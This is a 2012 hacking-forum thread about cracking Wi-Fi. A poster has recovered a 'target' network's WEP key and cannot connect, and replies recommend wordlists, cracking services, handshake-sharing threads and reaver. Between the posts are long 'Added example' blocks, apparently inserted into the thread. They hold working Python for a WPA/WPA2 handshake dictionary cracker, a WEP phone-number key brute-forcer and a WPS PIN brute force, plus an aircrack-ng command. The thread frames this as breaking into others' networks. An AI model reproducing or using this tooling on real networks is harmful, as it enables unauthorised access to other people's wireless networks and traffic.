Author Topic: WEP Cracking - Starting with the easy stuff  (Read 4176 times)


Offline Abe_L_2012

  • /dev/null
  • *
  • Posts: 10
  • Cookies: 0
WEP Cracking - Starting with the easy stuff
« on: April 16, 2012, 12:20:03 am »
I figure hacking skills will be a very useful skillset to have in some shit-hits-the-fan scenarios. So I am starting with the easy stuff, cracking wifi. That's a good place to start, no? I am open to suggestions.

The first time I cracked it totally passively, just collecting millions of #s. The second time I followed the WEP cracking wiki for aircrack. I ended up with success on a target both times, with the same hex key as a result.



I verified the key via airdecap.



I tried connecting using Wicd, using both

35:72:07:D1:9B:D5:FA:C8:01:FB:C7:2B:7C

and

357207D19BD5FAC801FBC72B7C

as the password, in all the WEP modes it has. All came back with "bad password" for some reason. I was also spoofing a client MAC, so I'm not sure what went wrong. How do I figure out what is going wrong? What is the next step?

Also, with all the decrypted packets I have, is there any way to try and reconstruct or something?



Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
Re: WEP Cracking - Starting with the easy stuff
« Reply #1 on: April 16, 2012, 07:56:46 am »
Next step is to figure a way to crack WPA, and after that - WPA2.

Offline Abe_L_2012

  • /dev/null
  • *
  • Posts: 10
  • Cookies: 0
Re: WEP Cracking - Starting with the easy stuff
« Reply #2 on: April 16, 2012, 12:27:42 pm »
I mean the next step in troubleshooting the WEP I am working on. Or am I better off just forgetting about it and moving on? Maybe I am, not a whole lot of people use WEP these days  ;D
« Last Edit: April 16, 2012, 12:29:08 pm by Abe_L_2012 »

Offline Axon

  • VIP
  • King
  • *
  • Posts: 2047
  • Cookies: 319
Re: WEP Cracking - Starting with the easy stuff
« Reply #3 on: April 16, 2012, 12:49:30 pm »
A stupid question.

Do you need a wordlist in any type of password cracking (Zip password, WEP password, etc.)?

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
Re: WEP Cracking - Starting with the easy stuff
« Reply #4 on: April 16, 2012, 12:59:33 pm »
You don't for WEP, but for WPA/WPA2 you kinda need to.

Praxis

  • Guest
Re: WEP Cracking - Starting with the easy stuff
« Reply #5 on: April 28, 2012, 06:11:20 pm »
How close are you to the AP? If you're not close enough, a lot of the time it will tell you that it's a "bad password", even if you do in fact have the correct password.

Quote
Do you need a wordlist in any type of password cracking (Zip password,WEP password, etc.)?

You don't need a wordlist to crack WEP. As mentioned before, you DO need one when cracking either WPA or WPA2. If your wordlist doesn't contain the password, you won't be able to crack the key so it's important that you use a good wordlist.

Quote
Next step is to figure a way to crack WPA, and after that - WPA2.

Am I wrong in thinking that WPA and WPA2 both use the same method of cracking, by grabbing the three-way handshake and running it against a wordlist?
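
Added example, not code from the thread or from aircrack-ng, to show concretely why WPA and WPA2-PSK are attacked the same way and why that attack needs a wordlist. The four-way handshake never carries the passphrase: it carries nonces and a MIC computed with a key (the KCK) derived from PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds). The only route is to guess a passphrase, redo the derivation and compare MICs. WPA (TKIP, EAPOL key descriptor version 1) and WPA2 (CCMP, version 2) differ only in the MIC hash, HMAC-MD5 versus HMAC-SHA1. The SSID, MAC addresses, nonces, wordlist and the message-2 frame below are all constructed in the script; nothing is captured traffic.

```python
"""WPA/WPA2-PSK handshake check in miniature (added example, constructed data)."""
import hashlib
import hmac
import struct

# EAPOL hdr(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32)
# + key IV(16) + RSC(8) + key ID(8) -> MIC field starts at byte 81 of the frame.
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK mapping: 4096 rounds of PBKDF2-HMAC-SHA1, 256-bit result."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 with label 'Pairwise key expansion'; bytes 0..15 are the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                 hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, version: int, frame_with_zero_mic: bytes) -> bytes:
    """Descriptor version 1 (WPA/TKIP): HMAC-MD5. Version 2 (WPA2/CCMP): HMAC-SHA1-128."""
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, frame_with_zero_mic, digest).digest()[:16]


def build_msg2(kck: bytes, version: int, snonce: bytes, replay: int = 1) -> bytes:
    """Construct a minimal EAPOL-Key message 2 (STA -> AP) carrying a valid MIC."""
    key_info = 0x0100 | 0x0008 | version           # MIC bit, pairwise bit, version
    desc_type = 2 if version == 2 else 254         # RSN (2) or legacy WPA (0xFE)
    body = struct.pack(">BHHQ", desc_type, key_info, 0, replay)
    body += snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0)
    frame = struct.pack(">BBH", 1, 3, len(body)) + body   # EAPOL v1, type 3 = Key
    mic = eapol_mic(kck, version, frame)                  # computed with MIC field zeroed
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
              snonce: bytes, msg2: bytes, wordlist) -> str:
    """The wordlist loop: derive PMK -> KCK per candidate and compare the MIC."""
    version = struct.unpack(">H", msg2[5:7])[0] & 0x7
    captured = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + bytes(16) + msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:          # WPA-PSK passphrases are 8..63 chars
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, version, zeroed), captured):
            return candidate
    return None


def demo():
    """Build a WPA and a WPA2 message 2 for the same passphrase, crack both."""
    ssid, passphrase = "constructed-net", "password"             # constructed
    ap_mac, sta_mac = bytes.fromhex("02aa000000a1"), bytes.fromhex("02bb000000b2")
    anonce, snonce = bytes(range(32)), bytes(range(100, 132))    # constructed nonces
    wordlist = ["123456", "letmein", "password", "qwertyuiop"]  # constructed list
    results = {}
    for version in (1, 2):
        kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                           ap_mac, sta_mac, anonce, snonce)[:16]
        msg2 = build_msg2(kck, version, snonce)
        results[version] = crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist)
    return results


if __name__ == "__main__":
    print(demo())
```

Two practical points fall out of the loop above. First, the cost is the 4096-round PBKDF2 per candidate, which is why GPU tools like pyrit or a precomputed PMK table for a given SSID help and why a wordlist that misses the passphrase simply never matches. Second, "123456" is skipped: WPA-PSK passphrases are 8 to 63 characters, so very short entries in a wordlist cost nothing but also can never be the answer. On a real capture the same check is `aircrack-ng -w wordlist.txt -b <bssid> capture.cap`, which needs the ANonce from message 1 and the MIC-bearing message 2 of the four-way handshake.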

Offline Axon

  • VIP
  • King
  • *
  • Posts: 2047
  • Cookies: 319
Re: WEP Cracking - Starting with the easy stuff
« Reply #6 on: April 28, 2012, 07:16:44 pm »
Quote
You don't need a wordlist to crack WEP. As mentioned before, you DO need one when cracking either WPA or WPA2. If your wordlist doesn't contain the password, you won't be able to crack the key so it's important that you use a good wordlist.


aha ... so not every wordlist is suitable for cracking WPA/WPA2? damn  >:(

Praxis

  • Guest
Re: WEP Cracking - Starting with the easy stuff
« Reply #7 on: April 28, 2012, 07:29:51 pm »

Quote
aha ... so not every wordlist is suitable for cracking WPA/WPA2? damn  >:(

Nope! There are some huge wordlists online though, they're your best bet. Also be sure to add some of the "common" passwords into the wordlist for best effect, like "password" or "123456" - you get the idea.

There are also online WPA/WPA2 cracking services, and some hacking forums even have threads where you can post handshakes and people will try and crack them :D

Offline techb

  • Soy Sauce Feeler
  • Global Moderator
  • King
  • *
  • Posts: 2350
  • Cookies: 345
  • Aliens do in fact wear hats.
Re: WEP Cracking - Starting with the easy stuff
« Reply #8 on: April 29, 2012, 01:14:30 am »
When I worked tech support for a DSL ISP, we had the customers use their 10-digit phone number as the password if they used WEP. You could brute force it if they are using a telephone number. The area code and first 3 digits wouldn't be hard to guess, and the only real brute forcing would go for the last 4 digits of the phone number.


Just food for thought.
>>>import this
-----------------------------
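
Added example, not code from the thread or from the aircrack-ng suite, covering two posts above: what airdecap-ng is actually checking when it "verifies" the posted key, and techb's phone-number case. In WEP, RC4 is seeded with the 3-byte IV followed by the key, and the decrypted body must end in a CRC-32 (the ICV) that matches the recovered payload; that ICV match is the oracle airdecap-ng uses, and it is also the oracle for testing candidate keys. A ten-character string can only be a WEP key as 10 hex digits (WEP-40: ASCII keys are 5 or 13 characters, hex keys 10 or 26), so the assumption here is that the ISP's routers took the ten digits as hex, which makes area code + exchange + 0000..9999 a 10,000-key space. The 104-bit key is the one posted in the first message; the IVs, payloads and the phone number 512-555-0417 are constructed for the script.

```python
"""WEP ICV check, used to verify a key and to brute-force a phone-number key
(added example, constructed frames; key id 0 assumed throughout)."""
import struct
import zlib


def parse_wep_key(text: str) -> bytes:
    """Accept aircrack-ng's 'AA:BB:..' or bare hex. 5 bytes = WEP-40, 13 = WEP-104."""
    key = bytes.fromhex(text.replace(":", ""))
    if len(key) not in (5, 13):
        raise ValueError(f"WEP keys are 5 or 13 bytes, got {len(key)}")
    return key


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP seeds it with the 3-byte IV prepended to the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes, key_id: int = 0) -> bytes:
    """802.11 WEP frame body: IV(3) | key-id byte | RC4(payload || ICV)."""
    ks = rc4_keystream(iv + key, len(payload) + 4)
    ct = bytes(p ^ k for p, k in zip(payload + icv(payload), ks))
    return iv + bytes([(key_id & 3) << 6]) + ct


def wep_decrypt(key: bytes, body: bytes):
    """Returns (icv_ok, payload). icv_ok False means wrong key or a modified frame,
    which is exactly what airdecap-ng counts as an undecryptable packet."""
    iv, ct = body[:3], body[4:]
    ks = rc4_keystream(iv + key, len(ct))
    pt = bytes(c ^ k for c, k in zip(ct, ks))
    payload, tail = pt[:-4], pt[-4:]
    return icv(payload) == tail, payload


def key_decrypts_all(key: bytes, bodies) -> bool:
    """A wrong key passes one frame's ICV with probability 2^-32, so require
    every captured frame to pass before accepting a candidate."""
    return all(wep_decrypt(key, b)[0] for b in bodies)


def brute_force_phone_key(area: str, exchange: str, bodies):
    """techb's case: fixed area code and exchange, 10,000 last-four-digit guesses,
    each tried as a 10-hex-digit WEP-40 key."""
    for n in range(10000):
        candidate = parse_wep_key(f"{area}{exchange}{n:04d}")
        if key_decrypts_all(candidate, bodies):
            return candidate
    return None


def demo():
    # (1) the posted 104-bit key, checked the way airdecap-ng checks it
    key104 = parse_wep_key("35:72:07:D1:9B:D5:FA:C8:01:FB:C7:2B:7C")
    body = wep_encrypt(key104, b"\x0a\x0b\x0c",                # constructed IV
                       b"\xaa\xaa\x03\x00\x00\x00\x08\x00constructed payload")
    good_ok, _ = wep_decrypt(key104, body)
    wrong_ok, _ = wep_decrypt(bytes(13), body)                 # all-zero key fails
    # (2) constructed number 512-555-0417 used as a WEP-40 hex key, recovered
    #     from three frames with the last four digits unknown
    phone_key = parse_wep_key("5125550417")
    frames = [wep_encrypt(phone_key, bytes([i, 0x11, 0x22]), b"payload %d" % i)
              for i in range(3)]
    found = brute_force_phone_key("512", "555", frames)
    return good_ok, wrong_ok, found.hex() if found else None


if __name__ == "__main__":
    print(demo())
```

One thing this makes visible about the connection problem in the first post: the 26 hex digits are a 13-byte WEP-104 key, and a client that treats them as 26 ASCII characters will reject them, because no WEP key is 26 bytes long. In wpa_supplicant.conf, `wep_key0=357207D19BD5FAC801FBC72B7C` without quotes is read as hex, while the same value in double quotes is read as an ASCII key; with iwconfig, a bare value is hex and an `s:` prefix means ASCII. Checking which form the client is using is a quicker first step than re-cracking.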

Offline palipr

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 0
Re: WEP Cracking - Starting with the easy stuff
« Reply #9 on: May 21, 2012, 06:04:06 am »
For WPA/WPA2 word lists are useful and are often the only way to go, considering the only alternative is brute forcing. For both of them I use pyrit to help the process along much quicker than just a CPU.


The wordlist(s) I use are from g0tmi1k: http://g0tmi1k.blogspot.com/2011/06/dictionaries-wordlists.html


(Using pyrit with a GeForce 460 GTX I can go through the 18-in-1 word list in approximately 6 hours)


But recently I have been using reaver to brute force the WPS part of a router to obtain the WPA keyphrase. It's not very fast either, but guaranteed to work as long as you give it enough time to do its thing.


Hope this is a helpful start for when you move onto WPA/WPA2
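
Added example, not code from the thread or from reaver, showing why the WPS PIN attack palipr mentions is a bounded search rather than a guess at 10^8 PINs. A WPS PIN is 8 digits, the last of which is a checksum over the first 7, and the registration protocol acknowledges the first 4 digits (at message M4) separately from the last 4 (at M6). So an attacker tries at most 10,000 first halves, then at most 1,000 second halves, because the checksum digit is computed rather than guessed: 11,000 attempts worst case. The registrar below is a stand-in that answers in-process; the AP PIN is constructed, and a real run speaks EAP over the air at a few seconds per attempt.

```python
"""WPS PIN checksum and split-half search against a simulated registrar
(added example; the AP PIN and the registrar are constructed here)."""


def wps_checksum(first7: int) -> int:
    """Checksum digit: weights 3,1,3,1,3,1,3 over the seven digits, mod 10."""
    accum = 0
    for _ in range(3):
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    accum += 3 * (first7 % 10)          # most significant digit carries weight 3
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


class SimulatedRegistrar:
    """Stand-in for the AP. Real APs reveal the same split: a NACK after M4 means
    the first half is wrong; a NACK after M6 means only the second half is."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("constructed AP PIN must have a valid checksum")
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "NACK-M4"        # first half wrong; exchange stops early
        if pin[4:] != self.pin[4:]:
            return "NACK-M6"        # first half right, second half wrong
        return "M7"                 # accepted; AP would now hand over the WPA credentials


def brute_force_wps(registrar):
    """Phase 1: 10,000 first halves. Phase 2: 1,000 second halves plus checksum."""
    first = None
    for a in range(10000):
        if registrar.try_pin(f"{a:04d}0000") != "NACK-M4":   # second half is a placeholder
            first = f"{a:04d}"
            break
    if first is None:
        return None
    for b in range(1000):
        first7 = int(first + f"{b:03d}")
        pin = f"{first7:07d}{wps_checksum(first7)}"
        if registrar.try_pin(pin) == "M7":
            return pin
    return None


def demo():
    """Recover a constructed AP PIN and report how many attempts it took."""
    registrar = SimulatedRegistrar("12345670")   # constructed; checksum digit is 0
    found = brute_force_wps(registrar)
    return found, registrar.attempts


if __name__ == "__main__":
    print(demo())
```

The "guaranteed given enough time" part rests on the AP answering every attempt. Many APs rate-limit or lock WPS after a run of failed PINs, which stretches the 11,000-attempt bound from hours into days or stops the attack outright, so the search order and retry delays matter more in practice than the arithmetic above suggests.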